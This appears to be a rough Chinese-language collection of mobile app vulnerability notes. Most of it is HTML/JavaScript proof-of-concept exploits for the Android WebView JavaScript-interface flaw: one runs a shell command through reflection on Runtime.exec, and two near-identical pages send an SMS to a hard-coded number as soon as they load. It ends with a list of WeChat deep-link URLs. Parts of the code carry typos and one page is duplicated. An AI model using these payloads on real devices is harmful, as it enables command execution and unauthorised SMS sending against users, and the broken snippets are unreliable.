移动app漏洞收集(待整理)

    <html>
       <body>
          <script>
             function execute(cmdArgs)
             {
                 return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
             }
             var res = execute(["/system/bin/sh", "-c", "ls -al /mnt/sdcard/"]);
             document.write(getContents(res.getInputStream()));
           </script>
       </body>
    </html>

这个是执行命令的poc

    <html>
    <head>
    <title>Test send</title>
    <script type="text/javascript">
    function execute() {
        var sendsms = jsInterface.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null),invoke(null,null);
        sendsms.sendTextMessage("13722555165",null,"get",null,null);
    }
    </script>
    </head>
    <body onload="execute()">
    <input type="button" onclick="="execute" value="test"/>
    </body>
    </html>

    <html>
    <head>
    <title>Test sendsms</title>
    <script type="text/javascript">
    function execute() {
        var sendsms = jsInterface.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null),invoke(null,null);
        sendsms.sendTextMessage("13722555165",null,"get",null,null);
    }
    </script>
    </head>
    <body onload="execute()">
    <input type="button" onclick="="execute" value="test"/>
    </body>
    </html>

weixin://dl/general
weixin://dl/favorites 收藏
weixin://dl/scan 扫一扫
weixin://dl/feedback 反馈
weixin://dl/moments 朋友圈
weixin://dl/settings 设置
weixin://dl/notifications 消息通知设置
weixin://dl/chat 聊天设置
weixin://dl/general 通用设置
weixin://dl/officialaccounts 公众号
weixin://dl/games 游戏
weixin://dl/help 帮助
weixin://dl/feedback 反馈
weixin://dl/profile 个人信息
weixin://dl/features 功能插件